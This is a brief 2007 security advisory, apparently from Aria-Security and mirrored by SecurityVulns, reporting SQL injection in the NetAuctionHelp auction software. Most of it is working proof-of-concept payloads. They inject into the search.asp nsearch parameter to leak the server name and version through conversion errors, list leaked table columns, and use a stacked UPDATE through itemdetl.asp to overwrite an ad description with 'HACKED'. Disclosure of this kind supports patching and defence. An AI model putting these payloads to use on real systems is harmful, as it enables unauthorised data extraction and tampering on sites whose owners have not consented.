Aria-Security.net: NetAuctionHelp SQL Injection

2007-11-22T00:00:00
ID SECURITYVULNS:DOC:18480
Type securityvulns
Reporter Securityvulns
Modified 2007-11-22T00:00:00

Description

Aria-Security Net Original Advisory @ http://aria-security.net/forum/showthread.php?p=1099


Vendor: http://www.netauctionhelp.com

PoC: search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=[SQL INJECTION] search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch='having 1=1--

search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@servername)-- search.asp?sort=ni&category=&categoryname=&kwsearch=&nsearch=1' or 1=convert(int,@@version)--

tblAd.id tblAd.aspectratio tblAd.title tblAd.imagepath tblAd.startdate tblAd.enddate tblAd.id_seller tblAd.descr

-1' UPDATE tblAd set descr= 'HACKED' Where(ID= '1');--

this code with update itemdetl.asp?id=1

Credit goes to Aria-Security.Net Greetz: AurA